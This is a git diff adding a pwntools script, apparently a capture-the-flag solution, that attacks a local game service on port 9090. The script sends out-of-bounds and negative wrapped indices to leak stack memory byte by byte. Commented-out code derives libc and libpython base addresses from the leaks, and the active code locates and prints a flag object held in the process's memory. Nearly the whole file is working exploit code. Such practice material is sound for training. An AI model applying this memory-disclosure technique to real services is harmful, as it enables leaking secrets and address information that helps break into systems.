1 files changed, 68 insertions, 0 deletions

diff --git a/meta/solve.py b/meta/solve.py
new file mode 100644
index 0000000..e1b8192
--- /dev/null
+++ b/meta/solve.py
@@ -0,0 +1,68 @@
+from pwn import *
+import psutil
+import time
+
+io = remote("localhost", 9090)
+if args.DEBUG:
+    time.sleep(1)
+    filter = lambda p : "game.py" in p.cmdline()
+    pid = [p.pid for p in psutil.process_iter() if filter(p)][0]
+    util.misc.run_in_new_terminal(f"sudo -E gdb --pid={pid}")
+    input()
+
+def leak(offset, unpack=True):
+    io.readuntil(b"Easy or Hard? ")
+    io.sendline(b"hard")
+
+    io.readuntil("Ready? ")
+    io.sendline(b"")
+
+    leak = []
+    for i in range(8):
+        io.readuntil(b"Index 1: ")
+        io.sendline(str(0).encode())
+
+        io.readuntil(b"Index 2: ")
+        if offset < 0:
+            io.sendline(str((1 << 64) + offset + i).encode())
+        else:
+            io.sendline(str(offset + i).encode())
+
+        line = io.readline()
+        leak.append(int(line.split(b" ")[1]))
+
+    if unpack:
+        return struct.unpack("<Q", bytes(leak))[0]
+    else:
+        return bytes(leak)
+
+# stack_leak = leak(-0x28)
+# numbers = stack_leak - 0x100
+# print("numbers", hex(numbers))
+# 
+# libc_leak = leak(-0x18)
+# libc_clock_gettime = 0x00000000000cd6a0
+# libc_base = libc_leak - 29 - libc_clock_gettime
+# print("libc", hex(libc_base))
+# 
+# libpython_base = libc_base + 0x1e7000
+# print("libpython", hex(libpython_base))
+# 
+# pythonvars_leak = libpython_base + 0x390858
+# vars_base = leak(pythonvars_leak - numbers)
+# print("pythonvars", hex(vars_base))
+# 
+# flag_var = vars_base + 0x7fd00
+# print("flag", hex(flag_var))
+
+#for i in range(10):
+#    print(leak(flag_var + i * 8 - numbers, False))
+
+numbers = leak(-0x30)
+print(numbers)
+flagobj = leak(-0xb48)
+print(flagobj)
+flagstr = flagobj + 0x30
+
+for i in range(4):
+    print(leak(flagstr + i * 8 - numbers, False))